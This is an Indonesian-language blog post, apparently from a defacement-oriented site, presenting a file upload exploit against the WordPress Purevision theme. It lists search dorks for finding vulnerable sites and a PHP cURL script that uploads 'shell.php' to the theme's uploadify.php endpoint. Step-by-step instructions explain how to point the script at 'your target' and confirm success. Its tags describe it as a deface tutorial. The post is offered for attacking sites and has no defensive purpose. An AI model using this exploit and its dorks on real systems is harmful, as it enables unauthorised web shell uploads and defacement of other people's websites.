Selamat Datang di Blog Idiot Attacker, Artikel terbaru Cara Aktifasi Microsoft Office 2016 Permanen Dengan KMSauto Net.

Wordpress Themes Purevision File Upload Vulnerability

Rio Setyawan 6:36 AM
Wordpress Themes Purevision File Upload Vulnerability


Exploit title: Wordpress Themes Purevision File Upload Vulnerability
Dork: inurl:/wp-content/themes/purevision
          inurl:/wp-content/themes/purevision intext:index of
          Index of /wp-content/themes/purevision/

Bahan-bahan:
- Xampp : Download


Exploit:

 <?php

$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?> 

Tutorial:
- Buka Xampp, start Apace dan MySql
- Edit Exploit di atas, example.com ganti dengan link target mu
- Simpan Exploit di C: > xampp > php dengan format .php
- Run exploit tadi dengan cmd, perintahnya php exploit.php enter

Jika keluar angka 1 tandanya exploit sukses atau target vuln





Tag: tutorial deface, cara deface, deface purevision, themes purevision, exploits, purevision, deface dengan purevision, step by step deface
Previous
Next Post »
0 Komentar